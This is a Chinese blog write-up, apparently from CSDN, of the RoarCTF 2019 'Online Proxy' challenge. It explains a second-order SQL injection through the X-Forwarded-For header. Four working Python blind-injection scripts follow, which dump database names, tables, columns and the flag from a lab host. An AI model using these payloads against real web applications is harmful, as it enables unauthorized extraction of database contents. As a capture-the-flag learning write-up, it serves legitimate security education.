[RoarCTF 2019]Online Proxy

最新推荐文章于 2024-03-29 07:00:00 发布
最新推荐文章于 2024-03-29 07:00:00 发布
阅读量2.6k 收藏 2
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/102636793
版权

1.1 X-Forwarded-For

一看到current IP和last IP,就应该想到,应该是把我们的IP给写到数据库里了。并且我们发现,通过X-Forwarded-For,确实可以伪造我们的IP。我感觉这到题就应该换一个名字,这题和proxy有半毛钱关系,而且那个duration time也是忽悠人了。

1.2 思路

我们测试一下,先输入 1’ or ‘1 此时我们的current IP就等于它,让后我们再随便换一个其他的东西,只要和刚才那个不一样就可以,比如111,那么我们的current IP就成了:111,而last IP就是1’ or ‘1,此时1’ or '1已经写入了数据库 .因为第一次和第二次传输的IP不一样,所以服务器并不会从数据库找last IP,它会把上次的IP(1’or ‘1)直接显示为last IP,让后存入数据库。那么我们再传一次111,因为和currnet IP相同,那么last IP就会从数据库里寻找,也就是会执行1’or‘1,结果为一。

1.3 hint:flag不一定在当前数据库

2.1 爆数据库

import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

2.2 表名

import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

2.3 字段

import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

2.4 flag

import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)
沐目_01
关注
专栏目录
ProxyError: Conda cannot proceed due to an error in your proxy configuration解决方案
weixin_43178406的博客
06-19 8万+
本文主要介绍了ProxyError: Conda cannot proceed due to an error in your proxy configuration解决方案,希望能对使用conda的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
WARNING:Retrying(Retry(total=2)) after connection broken by ‘ProxyError(‘Cannot connect to proxy解决方案
最新发布
weixin_43178406的博客
06-15 9万+
本文主要介绍了WARNING: Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ProxyError('Cannot connect to proxy.'解决方案,希望能对使用Python pip的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
BUUCTF--[RoarCTF 2019]Online Proxy
qq_46263951的博客
07-19 355
这里发现通过修改X-FORWARDED-FOR的值注释部分的内容也随之改变 尝试盲注,上传命令时第一次为Current Ip发现并不能执行,再次上传Current Ip时上次的Current Ip变为Last Ip也没有执行,再次send即可正常执行命令 简单尝试使用盲注得到所有库名,这里可以看到该方法是没问题的 ...
Desktop Proxy for Online Dictionaries-开源
06-30
DDict 是一个可扩展的桌面在线词典集成代理。 它驻留在系统托盘中,允许用户同时在多个在线词典中快速查找单词
seafile专业版集成微软的office online实现在线协同编辑
小李的csdn
12-11 8093
一.设备信息 名称 系统版本 配置 ip地址 seafile_server CentOS 7.6(core) 4c 4g 50g 192.168.2.129 office_online winserver_2012_R2 4c 4g 60g 192.168.2.131 客户机 Windows7 2c 2g 50g 192.168.2.1 2.此处应有环境初始化脚本,在...
[RoarCTF 2019]Online Proxy——二次注入,又是你?
Mrs_H的博客
10-30 980
前言 最近真属于是”多事之秋“了,平常不留作业的课最近都破天荒的留了作业。最近做题目的节奏又被打乱了,哎无语。之后想写一篇关于flask的文章,不知道什么时候才有机会,现在还是以sql注入为主。不说了,先看题吧。 正文 这道题又是二次注入的题目,但是注入点较之前的注入点位有很大的不同。这次的注入点在数据包头的XFF字段。 那么如何进行二次注入呢?请考虑如下代码 select '0'+(length(database())>0)+'0' from user 如果我们将上面的查询语句提前插入了数据库中,
JsProxy A js proxy online
04-21
A js proxy online or js packer offline.See help.html for more information.
[RoarCTF 2019]Online Proxy(x-forwarded-for盲注)
qq_62046696的博客
01-05 629
这道题点开题目然后题目显示不出网,一开始误认为是ssrf了,但是没有更多的信息了。源码有一个ip会不会是修改X-Forwarded-For就可以了呢,抓包试一下,发现有两个ip,一个当前一个是last上一个的意思把,这个本地是我火狐插件默认的。然后这里因为我经验少没感觉,看了大佬的讲解,才突然悟了,这一眼就可以看出一个sql注入的问题,因为last肯定存储到了一个数据库的里面不然查询10.244.80.206怎么能显示出来呢。
Proxy Online
weixin_30527143的博客
12-14 721
http://freenuts.com/top-10-free-online-proxy-websites/ aniscartujo.com browse007.com enoughschool.com hidemy.biz nobodycanstop.us polysolve.com schoolisgood.com sslunblock.com www.dtunnel.c...
[RoarCTF 2019]Online Proxy --不会编程的崽
不会编程的崽的博客
03-29 871
sql注入 盲注
[RoarCTF 2019]Online Proxy 盲注
scrawman的博客
01-26 3124
[RoarCTF 2019]Online Proxy bp抓包放包,可以用X-Forwarded-For修改IP。last Ip是存在数据库里的,我们先写一个sql注入语句作为IP,然后再修改两次其他的IP。这两次的IP要一样,那么第二次系统就要从数据库中查询last Ip,触发sql注入。 盲注: import requests url = "http://node4.buuoj.cn:26940//" head = { "GET" : "/ HTTP/1.1", "Cookie" : "trac
[RoarCTF 2019]Online Proxy ip二次注入
qq_54929891的博客
04-28 621
打开题目发现hint有点像文件泄露,于是打算用伪协议下载一下各个源码 发现报错,以为是flag或者php被过滤了,于是我下别的html文件,依然如此…… 用dirsearch扫描只出来两个文件一个db.php还有一个不记得去了(第二天写的wp),但是都没什么用 试了很久,发现没有https://就会报错 感觉这里不是切入点了,于是我抓包看看有没有别的信息 看到有个ip点,想着是不是SSTI,便试试X-Forwarded-For 发现可以控制Current ip,然后上一个ip..
[RoarCTF 2019]Easy Java
姜小孩的博客
05-06 279
[RoarCTF 2019]Easy Java WEB-INF/web.xml泄露
BUU [RoarCTF 2019]Online Proxy
Jay17的博客
03-08 442
BUU [RoarCTF 2019]Online Proxy
探索JavaScript Proxy的有趣应用
"JavaScript的Proxy可以用于创建对象的代理,实现对对象操作的自定义行为。Proxy是ES6引入的新特性,它通过定义一系列的traps(行为钩子)来控制对象的行为。本文将探讨Proxy能做的有意思的事情,并介绍其基本语法和...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值